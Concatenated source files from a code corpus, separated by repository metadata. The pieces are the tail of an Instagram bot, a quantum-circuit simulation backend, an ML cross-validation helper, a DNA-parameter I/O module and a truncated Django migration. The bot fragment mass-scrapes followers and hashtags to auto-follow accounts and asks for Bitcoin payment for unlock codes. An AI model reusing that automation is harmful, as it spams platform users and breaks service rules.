Bots.save_user_info(ig_username, "Buy 1 month for only $29 with unlimited tasks<a href='https://www.fiverr.com/hourapp/manage-your-instagram-account-with-ai' target='_blank'> Here!</a>")
print("Buy 20.000 more COINS send 0.001 BTC to 12R5b4rLyNL8cC2HYQi5NpdPNaaAxPnmfe")
print("To get key when bought talk to us here: https://web.telegram.org/#/im?p=@instabotai")
Bots.save_user_info(ig_username, "For support talk to us here: <a href='https://web.telegram.org/#/im?p=@instabotai' target='_blank'> Here!</a>")
def activate_code(code):
if code == "AAAEASDCCF" :
points = Bots.get_points()
points += 1000
print("You have activated your code")
elif code == "BBBSDRGTY" :
points = Bots.get_points()
points += 1000
print("You have activated your code")
elif code == "CCCAASDRT" :
points = Bots.get_points()
points = int(points)
points = points + 1000
points = str(points)
print(points)
with open(ig_username + "x.txt", "w+") as f:
f.write(points)
print("You have activated your code")
else:
print("wrong code")
def follow_users_following_ai(username, time_sleep):
Bots.save_user_info(ig_username, "Scraping users pls wait 2-4 min")
while True:
try:
username = Bots.convert_usernames_to_list(username)
for user in username:
user_id = bot.get_user_id_from_username(user)
followings = bot.get_user_following(user_id, nfollows=2000)
for user_id in followings:
username = bot.get_username_from_user_id(user_id)
Bots.face_detection_follow(username)
time_sleep = int(time_sleep)
time.sleep(time_sleep)
except:
user_id = bot.get_user_id_from_username(username)
followings = bot.get_user_following(user_id, nfollows=2000)
for user_id in followings:
username = bot.get_username_from_user_id(user_id)
Bots.face_detection_follow(username)
time_sleep = int(time_sleep)
time.sleep(time_sleep)
def follow_users_followers_ai(username, time_sleep):
Bots.save_user_info(ig_username, "Scraping users pls wait 2-4 min")
while True:
try:
username = Bots.convert_usernames_to_list(username)
for user in username:
user_id = bot.get_user_id_from_username(user)
followers = bot.get_user_followers(user_id, nfollows=2000)
for user_id in followers:
username = bot.get_username_from_user_id(user_id)
Bots.face_detection_follow(username)
time_sleep = int(time_sleep)
time.sleep(time_sleep)
except:
user_id = bot.get_user_id_from_username(username)
followers = bot.get_user_followers(user_id, nfollows=2000)
for user_id in followers:
username = bot.get_username_from_user_id(user_id)
Bots.face_detection_follow(username)
time_sleep = int(time_sleep)
time.sleep(time_sleep)
def follow_users_hashtag_ai(hashtag, time_sleep):
Bots.save_user_info(ig_username, "Scraping users pls wait 2-4 min")
while True:
hashtags = Bots.convert_usernames_to_list(hashtag)
for hashtag in hashtags:
hashtags = bot.get_hashtag_users(hashtag)
for user in hashtags:
username = bot.get_username_from_user_id(user)
Bots.face_detection_follow(username)
time.sleep(time_sleep)
| 43.559041
| 194
| 0.540853
|
be3b7467b0888fe86f0901469e076b4b751c9973
| 25,484
|
py
|
Python
|
quasar/backend.py
|
qfizik/quasar
|
405cf60283be79adda59a6eed27fe866e2e18288
|
[
"Apache-2.0"
] | 1
|
2020-07-15T16:01:27.000Z
|
2020-07-15T16:01:27.000Z
|
quasar/backend.py
|
qfizik/quasar
|
405cf60283be79adda59a6eed27fe866e2e18288
|
[
"Apache-2.0"
] | null | null | null |
quasar/backend.py
|
qfizik/quasar
|
405cf60283be79adda59a6eed27fe866e2e18288
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import collections
import sortedcontainers
from .pauli import Pauli, PauliExpectation, PauliString
from .algebra import Algebra
from .circuit import Gate, Circuit
class Backend(object):
""" Class Backend represents a physical or simulated quantum circuit
resource. Backends must implement `run_measurement`, from which many
higher-order quantities may be computed, e.g., `run_pauli_expectation`,
`run_pauli_expectation_value`, `run_pauli_expectation_value_gradient`,
etc. Backends supporting classical statevector-based simulation may
also optionally implement `run_statevector,` from which many additional
higher-order quantities may be computed, e.g., `run_unitary`,
`run_density_matrix`, and ideal-infinite-sampled versions of the
previously-discussed higher-order quantities. Backends may additionally
overload any of the stock higher-order methods declared here,
potentially providing increased performance or additional methodology.
"""
def __init__(
self,
):
""" Constructor, initializes and holds quantum resource pointers such
as API keys.
Backend subclasses should OVERLOAD this method.
"""
pass
def __str__(self):
""" A 1-line string representation of this Backend
Returns:
(str) - 1-line string representation of this Backend
Backend subclasses should OVERLOAD this method.
"""
raise NotImplementedError
@property
def summary_str(self):
""" A more-extensive string representation of this Backend, optionally
including current hardware state.
Returns:
(str) - multiline string representation of this Backend
Backend subclasses should OVERLOAD this method.
"""
raise NotImplementedError
@property
def has_run_statevector(
self,
):
""" Does this Backend support run_statevector?
Returns:
(bool) - True if run_statevector is supported else False.
Backend subclasses should OVERLOAD this method.
"""
raise NotImplementedError
@property
def has_statevector_input(
self,
):
""" Does this Backend allow statevector to be passed as input argument
to various run methods?
Returns:
(bool) - True if statevector input arguments can be supplied else
False.
Backend subclasses should OVERLOAD this method.
"""
raise NotImplementedError
def run_statevector(
self,
circuit,
statevector=None,
min_qubit=None,
nqubit=None,
dtype=np.complex128,
**kwargs):
raise NotImplementedError
def run_pauli_sigma(
self,
pauli,
statevector,
min_qubit=None,
nqubit=None,
dtype=np.complex128,
**kwargs):
min_qubit = pauli.min_qubit if min_qubit is None else min_qubit
nqubit = pauli.nqubit if nqubit is None else nqubit
pauli_gates = {
'X' : Gate.X,
'Y' : Gate.Y,
'Z' : Gate.Z,
}
statevector2 = np.zeros_like(statevector)
for string, value in pauli.items():
circuit2 = Circuit()
for qubit, char in string:
circuit2.add_gate(pauli_gates[char], qubit)
statevector3 = self.run_statevector(
circuit=circuit2,
statevector=statevector,
dtype=dtype,
min_qubit=min_qubit,
nqubit=nqubit,
)
statevector2 += value * statevector3
return statevector2
def run_pauli_diagonal(
self,
pauli,
min_qubit=None,
nqubit=None,
dtype=np.complex128,
**kwargs):
min_qubit = pauli.min_qubit if min_qubit is None else min_qubit
nqubit = pauli.nqubit if nqubit is None else nqubit
# All I or Z strings
pauli2 = Pauli.zero()
for string, value in pauli.items():
if len(string) == 0 or all(_ == 'Z' for _ in string.chars):
pauli2[string] = value
statevector = np.ones((2**nqubit,), dtype=dtype)
return self.run_pauli_sigma(
pauli=pauli2,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
def run_unitary(
self,
circuit,
min_qubit=None,
nqubit=None,
dtype=np.complex128,
**kwargs):
nqubit = circuit.nqubit if nqubit is None else nqubit
U = np.zeros((2**nqubit,)*2, dtype=dtype)
for i in range(2**nqubit):
statevector = np.zeros((2**nqubit,), dtype=dtype)
statevector[i] = 1.0
U[:, i] = self.run_statevector(circuit, statevector=statevector, dtype=dtype, **kwargs)
return U
def run_density_matrix(
self,
circuit,
statevector=None,
min_qubit=None,
nqubit=None,
dtype=np.complex128,
**kwargs):
statevector = self.run_statevector(
circuit=circuit,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
return np.outer(statevector, statevector.conj())
def run_measurement(
self,
circuit,
nmeasurement=None,
statevector=None,
min_qubit=None,
nqubit=None,
dtype=np.complex128,
**kwargs):
statevector = self.run_statevector(
circuit=circuit,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
return Algebra.sample_histogram_from_probabilities(
probabilities=(np.conj(statevector) * statevector).real,
nmeasurement=nmeasurement,
)
def run_pauli_expectation(
self,
circuit,
pauli,
nmeasurement=None,
statevector=None,
min_qubit=None,
nqubit=None,
dtype=np.complex128,
**kwargs):
if nmeasurement is None:
return self.run_pauli_expectation_ideal(
circuit=circuit,
pauli=pauli,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
else:
return self.run_pauli_expectation_measurement(
circuit=circuit,
pauli=pauli,
nmeasurement=nmeasurement,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
def run_pauli_expectation_value(
self,
circuit,
pauli,
nmeasurement=None,
statevector=None,
min_qubit=None,
nqubit=None,
dtype=np.complex128,
**kwargs):
if nmeasurement is None:
return self.run_pauli_expectation_value_ideal(
circuit=circuit,
pauli=pauli,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
else:
pauli_expectation = self.run_pauli_expectation_measurement(
circuit=circuit,
pauli=pauli,
nmeasurement=nmeasurement,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
return pauli_expectation.dot(pauli)
def run_pauli_expectation_value_gradient(
self,
circuit,
pauli,
nmeasurement=None,
statevector=None,
min_qubit=None,
nqubit=None,
dtype=np.complex128,
parameter_indices=None,
**kwargs):
# Current circuit parameter values
parameter_values = circuit.parameter_values
# Default to taking the gradient with respect to all parameters
if parameter_indices is None:
parameter_indices = list(range(len(parameter_values)))
# Check that the gradient formula is known for these parameters (i.e., Rx, Ry, Rz gates)
parameter_keys = circuit.parameter_keys
for parameter_index in parameter_indices:
key = parameter_keys[parameter_index]
times, qubits, key2 = key
gate = circuit.gates[(times, qubits)]
if not gate.name in ('Rx', 'Ry', 'Rz'):
raise RuntimeError('Unknown gradient rule: presently can only differentiate Rx, Ry, Rz gates: %s' % gate)
# Evaluate the gradient by the parameter shift rule
gradient = np.zeros((len(parameter_indices),), dtype=dtype)
circuit2 = circuit.copy()
for index, parameter_index in enumerate(parameter_indices):
# +
parameter_values2 = parameter_values.copy()
parameter_values2[parameter_index] += np.pi / 4.0
circuit2.set_parameter_values(parameter_values2)
Ep = self.run_pauli_expectation_value(
circuit=circuit2,
pauli=pauli,
nmeasurement=nmeasurement,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
# -
parameter_values2 = parameter_values.copy()
parameter_values2[parameter_index] -= np.pi / 4.0
circuit2.set_parameter_values(parameter_values2)
Em = self.run_pauli_expectation_value(
circuit=circuit2,
pauli=pauli,
nmeasurement=nmeasurement,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
# Assembly
gradient[index] = Ep - Em
return gradient
def run_pauli_expectation_value_hessian(
self,
circuit,
pauli,
nmeasurement=None,
statevector=None,
min_qubit=None,
nqubit=None,
dtype=np.complex128,
parameter_pair_indices=None,
**kwargs):
# Current circuit parameter values
parameter_values = circuit.parameter_values
# Default to taking the gradient with respect to all parameters
if parameter_pair_indices is None:
parameter_pair_indices = []
for i in range(len(parameter_values)):
for j in range(len(parameter_values)):
parameter_pair_indices.append((i,j))
# Check that the Hessian formula is known for these parameters (i.e., Rx, Ry, Rz gates)
parameter_keys = circuit.parameter_keys
for parameter_index1, parameter_index2 in parameter_pair_indices:
key = parameter_keys[parameter_index1]
times, qubits, key2 = key
gate = circuit.gates[(times, qubits)]
if not gate.name in ('Rx', 'Ry', 'Rz'):
raise RuntimeError('Unknown Hessian rule: presently can only differentiate Rx, Ry, Rz gates: %s' % gate)
key = parameter_keys[parameter_index2]
times, qubits, key2 = key
gate = circuit.gates[(times, qubits)]
if not gate.name in ('Rx', 'Ry', 'Rz'):
raise RuntimeError('Unknown Hessian rule: presently can only differentiate Rx, Ry, Rz gates: %s' % gate)
# Evaluate the gradient by the parameter shift rule
hessian = np.zeros((len(parameter_pair_indices),), dtype=dtype)
circuit2 = circuit.copy()
for index, parameter_pair_index in enumerate(parameter_pair_indices):
parameter_index1, parameter_index2 = parameter_pair_index
symmetric = (parameter_index2, parameter_index1) in parameter_pair_indices
if symmetric and parameter_index1 > parameter_index2: continue
# ++
parameter_values2 = parameter_values.copy()
parameter_values2[parameter_index1] += np.pi / 4.0
parameter_values2[parameter_index2] += np.pi / 4.0
circuit2.set_parameter_values(parameter_values2)
Epp = self.run_pauli_expectation_value(
circuit=circuit2,
pauli=pauli,
nmeasurement=nmeasurement,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
# +-
parameter_values2 = parameter_values.copy()
parameter_values2[parameter_index1] += np.pi / 4.0
parameter_values2[parameter_index2] -= np.pi / 4.0
circuit2.set_parameter_values(parameter_values2)
Epm = self.run_pauli_expectation_value(
circuit=circuit2,
pauli=pauli,
nmeasurement=nmeasurement,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
# -+
parameter_values2 = parameter_values.copy()
parameter_values2[parameter_index1] -= np.pi / 4.0
parameter_values2[parameter_index2] += np.pi / 4.0
circuit2.set_parameter_values(parameter_values2)
Emp = self.run_pauli_expectation_value(
circuit=circuit2,
pauli=pauli,
nmeasurement=nmeasurement,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
# --
parameter_values2 = parameter_values.copy()
parameter_values2[parameter_index1] -= np.pi / 4.0
parameter_values2[parameter_index2] -= np.pi / 4.0
circuit2.set_parameter_values(parameter_values2)
Emm = self.run_pauli_expectation_value(
circuit=circuit2,
pauli=pauli,
nmeasurement=nmeasurement,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
# Assembly
hessian[index] = Epp - Epm - Emp + Emm
if symmetric:
hessian[parameter_pair_indices.index((parameter_index2, parameter_index1))] = hessian[index]
return hessian
def run_pauli_expectation_value_gradient_pauli_contraction(
self,
circuit,
pauli,
parameter_coefficients,
nmeasurement=None,
statevector=None,
min_qubit=None,
nqubit=None,
dtype=np.complex128,
parameter_indices=None,
**kwargs):
# Current circuit parameter values
parameter_values = circuit.parameter_values
# Default to taking the gradient with respect to all parameters
if parameter_indices is None:
parameter_indices = list(range(len(parameter_values)))
# Check that parameter coefficients make sense
if len(parameter_coefficients) != len(parameter_indices):
raise RuntimeError('len(parameter_coefficients) != len(parameter_indices)')
# Check that the gradient formula is known for these parameters (i.e., Rx, Ry, Rz gates)
parameter_keys = circuit.parameter_keys
for parameter_index in parameter_indices:
key = parameter_keys[parameter_index]
times, qubits, key2 = key
gate = circuit.gates[(times, qubits)]
if not gate.name in ('Rx', 'Ry', 'Rz'):
raise RuntimeError('Unknown gradient rule: presently can only differentiate Rx, Ry, Rz gates: %s' % gate)
# Evaluate the gradient by the parameter shift rule
pauli_gradient = PauliExpectation.zero()
circuit2 = circuit.copy()
for index, parameter_index in enumerate(parameter_indices):
# +
parameter_values2 = parameter_values.copy()
parameter_values2[parameter_index] += np.pi / 4.0
circuit2.set_parameter_values(parameter_values2)
Gp = self.run_pauli_expectation(
circuit=circuit2,
pauli=pauli,
nmeasurement=nmeasurement,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
# -
parameter_values2 = parameter_values.copy()
parameter_values2[parameter_index] -= np.pi / 4.0
circuit2.set_parameter_values(parameter_values2)
Gm = self.run_pauli_expectation(
circuit=circuit2,
pauli=pauli,
nmeasurement=nmeasurement,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
# Assembly
pauli_gradient += parameter_coefficients[index] * (Gp - Gm)
return pauli_gradient
# => Utility Methods <= #
def run_pauli_expectation_ideal(
self,
circuit,
pauli,
statevector=None,
min_qubit=None,
nqubit=None,
dtype=np.complex128,
**kwargs):
min_qubit = pauli.min_qubit if min_qubit is None else min_qubit
nqubit = pauli.nqubit if nqubit is None else nqubit
statevector = self.run_statevector(
circuit=circuit,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
pauli_expectation = PauliExpectation.zero()
for string in pauli.keys():
pauli2 = Pauli.zero()
pauli2[string] = 1.0
statevector2 = self.run_pauli_sigma(
pauli=pauli2,
statevector=statevector,
dtype=dtype,
min_qubit=min_qubit,
nqubit=nqubit,
)
scal = np.sum(statevector.conj() * statevector2)
pauli_expectation[string] = scal
return pauli_expectation
def run_pauli_expectation_value_ideal(
self,
circuit,
pauli,
statevector=None,
min_qubit=None,
nqubit=None,
dtype=np.complex128,
**kwargs):
statevector = self.run_statevector(
circuit=circuit,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
statevector2 = self.run_pauli_sigma(
pauli=pauli,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
return np.sum(statevector.conj() * statevector2)
# => Measurement-based Pauli expectations <= #
# TODO: As always, there remains much work to be done in the conceptual,
# pragmatical, and syntactical elements of this functionality
def run_pauli_expectation_measurement(
self,
circuit,
pauli,
nmeasurement,
statevector=None,
min_qubit=None,
nqubit=None,
dtype=np.complex128,
**kwargs):
min_qubit = pauli.min_qubit if min_qubit is None else min_qubit
nqubit = pauli.nqubit if nqubit is None else nqubit
# Determine commuting group
groups = self.linear_commuting_group(
pauli,
min_qubit=min_qubit,
nqubit=nqubit,
)
# Else exception will be raised if unknown commuting group
# TODO: Optimally cover all commuting groups
# Modified circuits for basis transformations
circuits = [self.circuit_in_basis(
circuit,
basis,
min_qubit=min_qubit,
nqubit=nqubit,
)
for basis in groups.keys()]
# Measurements in commuting group (quantum heavy)
probabilities = [self.run_measurement(
circuit=circuit,
nmeasurement=nmeasurement,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs) for circuit in circuits]
# Convert to counts
results = [_.to_count_histogram() for _ in probabilities]
# Counts for pauli strings
counts = { _ : 0 for _ in pauli.keys() }
ns = { _ : 0 for _ in pauli.keys() }
for group, result in zip(groups.keys(), results):
strings = groups[group]
for string in strings:
qubits = string.qubits
ns[string] += nmeasurement
for ket, count in result.items():
parity = sum((ket & (1 << (nqubit - 1 - (_ - min_qubit)))) >> (nqubit - 1 - (_ - min_qubit)) for _ in qubits) % 2
counts[string] += (-count) if parity else (+count)
# Pauli density matrix values
pauli_expectation = PauliExpectation(collections.OrderedDict([
(_, counts[_] / max(ns[_], 1)) for _ in pauli.keys()]))
if PauliString.I() in pauli_expectation:
pauli_expectation[PauliString.I()] = 1.0
return pauli_expectation
@staticmethod
def linear_commuting_group(
pauli,
min_qubit=None,
nqubit=None,
):
min_qubit = pauli.min_qubit if min_qubit is None else min_qubit
nqubit = pauli.nqubit if nqubit is None else nqubit
keys = sortedcontainers.SortedSet()
for string in pauli.keys():
for qubit, char in string:
keys.add(char)
groups = collections.OrderedDict()
for keyA in keys:
for keyB in keys:
groups[((keyA + keyB)*nqubit)[:nqubit]] = []
for string in pauli.keys():
# Do not do the identity operator
if string.order == 0: continue
# Add to all valid commuting groups
found = False
for group, strings2 in groups.items():
valid = True
for qubit, char in string:
if group[qubit - min_qubit] != char:
valid = False
break
if not valid: continue
strings2.append(string)
found = True
if not found: raise RuntimeError('Invalid string - not in linear commuting group: %s' % str(string))
return groups
@staticmethod
def circuit_in_basis(
circuit,
basis,
min_qubit=None,
nqubit=None,
):
min_qubit = circuit.min_qubit if min_qubit is None else min_qubit
nqubit = circuit.nqubit if nqubit is None else nqubit
if len(basis) != nqubit: raise RuntimeError('len(basis) != nqubit')
basis_circuit = Circuit()
for A, char in enumerate(basis):
qubit = A - min_qubit
if char == 'X': basis_circuit.H(qubit)
elif char == 'Y': basis_circuit.Rx2(qubit)
elif char == 'Z': continue # Computational basis
else: raise RuntimeError('Unknown basis: %s' % char)
return Circuit.join_in_time([circuit, basis_circuit])
# => Subset Hamiltonian Utilities <= #
def run_pauli_matrix_subset(
self,
pauli,
kets,
min_qubit=None,
nqubit=None,
dtype=np.complex128,
):
min_qubit = pauli.min_qubit if min_qubit is None else min_qubit
nqubit = pauli.nqubit if nqubit is None else nqubit
if len(set(kets)) != len(kets):
raise RuntimeError('Kets are not unique')
kets2 = { ket : index for index, ket in enumerate(kets) }
H = np.zeros((len(kets),)*2, dtype=np.complex128)
for ket_index, ket in enumerate(kets):
for string, value in pauli.items():
value = value + 0.j # Make sure value is complex
bra = ket
for qubit2, char in string:
qubit = qubit2 - min_qubit
if char == 'Z':
value *= -1.0 if (ket & (1 << (nqubit - 1 - qubit))) else 1.0
elif char == 'X':
bra ^= (1 << (nqubit - 1 - qubit))
elif char == 'Y':
value *= -1.j if (ket & (1 << (nqubit - 1 - qubit))) else 1.j
bra ^= (1 << (nqubit - 1 - qubit))
bra_index = kets2.get(bra, None)
if bra_index is None: continue
H[bra_index, ket_index] += value
return np.array(H, dtype=dtype)
| 33.399738
| 133
| 0.563059
|
723021b8eb8d9fb63d046c7bfbc34fe72d6eda3b
| 3,000
|
py
|
Python
|
Model/Analyzer.py
|
Wenbintum/wwl_github
|
adee8de1be0f92228abd09606fee8825a8368f04
|
[
"MIT"
] | null | null | null |
Model/Analyzer.py
|
Wenbintum/wwl_github
|
adee8de1be0f92228abd09606fee8825a8368f04
|
[
"MIT"
] | null | null | null |
Model/Analyzer.py
|
Wenbintum/wwl_github
|
adee8de1be0f92228abd09606fee8825a8368f04
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
from sklearn.model_selection import KFold
import numpy as np
from ML_learning import Train_gpr, Train_krr
from sklearn.metrics import mean_absolute_error, mean_squared_error
from statistics import mean
def plt_distribution(x, n_bin, dpi=100):
fig, axs = plt.subplots(tight_layout=True)
#fig, axs = plt.subplots(1, 2, tight_layout=True) #sharey=True
axs.hist(x, bins=n_bin)
axs.set_xlabel('Adsorption energy (eV)')
axs.set_ylabel('Numbers')
# axs[1].hist(x, bins=n_bin, density=True)
# axs[1].yaxis.set_major_formatter(PercentFormatter(xmax=1))
plt.savefig('distribution.png',dpi=dpi)
def Check_outlier(target,prediction,name_list,threshold=0.5):
outlier_list = {}
for i, values in enumerate(list(zip(target,prediction,name_list))):
abs_error = abs(values[0]-values[1])
if abs_error > threshold:
#extract file name of outlier to a list
outlier_list[values[2]]=abs_error
return dict(sorted(outlier_list.items(), key=lambda item: item[1]))
def KF_validation(kernel_matrix, y, ML_method, name_list=None,
n_split=5,shuffle=True,random_state=0
):
kf = KFold(n_splits=n_split,shuffle=shuffle,random_state=random_state)
train_RMSEs,train_MAEs,test_RMSEs,test_MAEs,test_outliers =[],[],[],[],{}
for train_index, test_index in kf.split(kernel_matrix[0],y):
#get train_matrix and test_matrix
train_matrix = kernel_matrix[train_index][:,train_index]
test_matrix = kernel_matrix[test_index][:,train_index]
#y_train, y_test, name_train, name_test
y_train, y_test = y[train_index], y[test_index]
name_train, name_test = name_list[train_index], name_list[test_index] #outlier
#train a model
if ML_method == 'gpr':
ml_model = Train_gpr(train_matrix, y_train)
if ML_method == 'krr':
ml_model = Train_krr(train_matrix, y_train)
#predict training and validation
train_pre = ml_model.predict(train_matrix)
test_pre = ml_model.predict(test_matrix)
test_outlier = Check_outlier(y_test,test_pre,name_test)
#test_outlier= Check_outlier(y_test,test_pre,name_test)
# evaluate MAE and RMSE
train_MAE = mean_absolute_error(train_pre, y_train)
test_MAE = mean_absolute_error(test_pre, y_test)
train_RMSE = mean_squared_error(train_pre, y_train,squared=False)
test_RMSE = mean_squared_error(test_pre, y_test,squared=False)
# append
train_MAEs.append(train_MAE)
train_RMSEs.append(train_RMSE)
test_MAEs.append(test_MAE)
test_RMSEs.append(test_RMSE)
test_outliers.update(test_outlier)
avr_train_MAE = mean(train_MAEs)
avr_test_MAE = mean(test_MAEs)
avr_train_RMSE = mean(train_RMSEs)
avr_test_RMSE = mean(test_RMSEs)
return avr_train_MAE, avr_train_RMSE, avr_test_MAE, avr_test_RMSE,test_outliers
| 42.857143
| 86
| 0.698
|
a2fb82aa0b9481e7f58a554cb23f7358841777fe
| 6,261
|
py
|
Python
|
system/IOlib.py
|
haddocking/3D-DART
|
c94ab30f8d96ab1232d55ed136bc8299dcaa5112
|
[
"Apache-2.0"
] | 2
|
2020-07-23T09:27:00.000Z
|
2021-06-23T14:47:33.000Z
|
system/IOlib.py
|
haddocking/3D-DART
|
c94ab30f8d96ab1232d55ed136bc8299dcaa5112
|
[
"Apache-2.0"
] | 3
|
2020-04-23T15:28:57.000Z
|
2020-08-27T07:52:25.000Z
|
system/IOlib.py
|
haddocking/3D-DART
|
c94ab30f8d96ab1232d55ed136bc8299dcaa5112
|
[
"Apache-2.0"
] | 4
|
2020-02-25T12:57:57.000Z
|
2021-06-23T14:47:40.000Z
|
#!/usr/bin/env python2.7
import os,sys,re
from Utils import *
from numpy import *
from Constants import *
def WritePar(database,filename,verbose=False):
"""Write 3DNA base-pair and base-pair step parameter file (*.par)"""
if filename == None:
filename = 'parfile'
if verbose == True:
outfile = sys.stdout
else:
MakeBackup(os.path.splitext(filename)[0]+'.par')
outfile = file(os.path.splitext(filename)[0]+'.par','w')
print(" * Writing new parameter file with name %s" % filename)
for param in BASEPAIR_STEPS: #All first values for base-pair step parameters are always 0
database.Update(param,float(0),0)
outfile.write(" %s base-pairs\n" % len(database['sequence']))
outfile.write(" 0 ***local base-pair & step parameters***\n")
outfile.write(" Shear Stretch Stagger Buckle Prop-Tw Opening Shift Slide Rise Tilt Roll Twist\n")
for n in range(len(database['sequence'])):
outfile.write("%s %7.2f %7.2f %7.2f %7.2f %7.2f %7.2f %7.2f %7.2f %7.2f %7.2f %7.2f %7.2f\n" % (database['sequence'][n],database['shear'][n],
database['stretch'][n],database['stagger'][n],database['buckle'][n],database['proptw'][n],database['opening'][n],
database['shift'][n],database['slide'][n],database['rise'][n],database['tilt'][n],database['roll'][n],database['twist'][n]))
if verbose == False:
outfile.close()
class InputOutputControl:
"""Acts as a plugin input and output control. Input and output requirements are checked against extensions or files.
Generation and use of files within the plugin are controled by this class in a similar manner"""
def __init__(self):
self.checkedinput = {}
def _CheckFile(self,files,requirements):
if requirements == None or requirements == 'None':
extensions = []
for n in files:
ext = os.path.splitext(n)[1]
if ext in extensions:
pass
else:
extensions.append(ext)
for extension in extensions:
self.checkedinput[extension] = []
else:
splitter = re.compile(',')
requirements = splitter.split(requirements)
for requirement in requirements:
self.checkedinput[requirement] = []
for n in files:
if os.path.isfile(n):
extension = os.path.splitext(n)[1]
if self.checkedinput.has_key(extension):
self.checkedinput[extension].append(n)
elif self.checkedinput.has_key(os.path.basename(n)):
self.checkedinput[os.path.basename(n)].append(n)
else:
print " * InputCheck ERROR: file", n, "not found"
def CheckInput(self,files,requirements=None):
filelist = []
if type(files) == type(""):
filelist.append(files)
elif type(files) == type([]):
filelist = files
for files in filelist:
if os.path.basename(files) == 'selection.list':
readfile = file(files,'r')
lines = readfile.readlines()
for line in lines:
filelist.append(line.strip())
self._CheckFile(filelist,requirements)
def InputUpdate(self,reference,required):
"""Update the dictionary of files"""
self.checkedinput[required] = []
for n in self.checkedinput[reference]:
expected = RenameFilepath(n,path=os.getcwd(),extension=required)
if os.path.isfile(expected):
self.checkedinput[required].append(expected)
else:
print " * InputCheck ERROR: file", expected, "expected but not found"
def CheckOutput(self,files,requirements=None):
"""Check if required output is generated"""
if not requirements or requirements == 'self':
requirements = []
else:
splitter = re.compile(',')
requirements = splitter.split(requirements)
inputfiles = self.DictToList()
output_expect = []
for a in inputfiles:
basename, extension = os.path.splitext(os.path.basename(a))
for requirement in requirements:
if requirement[0] in ['.','_']: output_expect.append(basename+requirement)
for requirement in requirements:
if not requirement[0] in ['.','_']: output_expect.append(requirement)
for a in output_expect:
if not os.path.isfile(a): print " * WARNING: file:", a, "is not present in the output"
"""True output"""
output_true = []
for a in files:
output_true.append(os.path.join(os.getcwd(),a))
return output_true
def DictToList(self):
"""Return dictionary as plain list of files"""
filelist = []
for n in self.checkedinput:
filelist = filelist+self.checkedinput[n]
return filelist
class DatabaseDeamon:
"""This module allows for the quick construction, maipualtion and export of databses.
The database is constructed as aq library, data is stored depending on type as either
an array of values (floats) or a list of strings"""
def __init__(self):
self.database = {}
def __getitem__(self,key):
"""Retrieve data from database"""
return self.database[key]
def _TypeCheck(self,data):
"""Check input on type 'float','integer','string','list',or single value. If None
of these return None"""
checked = []
datatype = None
if type(data) == type([]):
for items in data:
try:
checked.append(float(items))
except:
checked.append(items)
elif isinstance(data, float) or isinstance(data, int):
checked.append(float(data))
elif isinstance(data, str):
checked.append(data)
elif isinstance(data, type(array(0))):
checked = data
else:
checked = None
return checked
def Update(self,key,item,index=None):
"""Update data in database. Update complete dataset for a given database entry or update a value
in the dataset."""
if not index == None:
if self.database.has_key(key) == True:
self.database[key][index] = self._TypeCheck(item)[0]
try:
self.database[key][index] = self._TypeCheck(item)[0]
except:
print(" * ERROR: failed database update of dataset %s at index %i\n" % (key,index))
else:
if self.database.has_key(key) == True:
if len(item) == len(self.database[key]):
del self.database[key]
self.database[key] = self._TypeCheck(item)
else:
print(" * DATABASE-ERROR: new list of items does not match length of old list")
def Load(self,name,data):
"""Load checked data in database"""
self.database[name] = self._TypeCheck(data)
| 29.533019
| 143
| 0.665069
|
4ed2727b95f3d9895506888e51daf3d440768d5d
| 1,191
|
py
|
Python
|
django/gsmap/migrations/0013_auto_20200405_1555.py
|
n0rdlicht/spatial-data-package-platform
|
97659a5f5e3df1ee78c31a3d0cee7bcab0c34c22
|
[
"MIT"
] | 14
|
2020-11-26T11:20:55.000Z
|
2022-03-02T15:48:51.000Z
|
django/gsmap/migrations/0013_auto_20200405_1555.py
|
n0rdlicht/spatial-data-package-platform
|
97659a5f5e3df1ee78c31a3d0cee7bcab0c34c22
|
[
"MIT"
] | 328
|
2020-11-26T16:01:06.000Z
|
2022-03-28T03:15:07.000Z
|
django/gsmap/migrations/0013_auto_20200405_1555.py
|
n0rdlicht/spatial-data-package-platform
|
97659a5f5e3df1ee78c31a3d0cee7bcab0c34c22
|
[
"MIT"
] | 2
|
2020-12-01T15:08:23.000Z
|
2020-12-22T14:06:30.000Z
|
# Generated by Django 3.0.3 on 2020-04-05 15:55
from django.db import migrations, models
import gsmap.models
import sortedm2m.fields
class Migration(migrations.Migration):
dependencies = [
('gsmap', '0012_auto_20200405_0850'),
]
operations = [
migrations.AlterField(
model_name='snapshot',
name='permission',
field=models.IntegerField(choices=[(0, 'PUBLIC'), (10, 'NOT_LISTED')], default=gsmap.models.SnapshotPermission['PUBLIC']),
),
migrations.CreateModel(
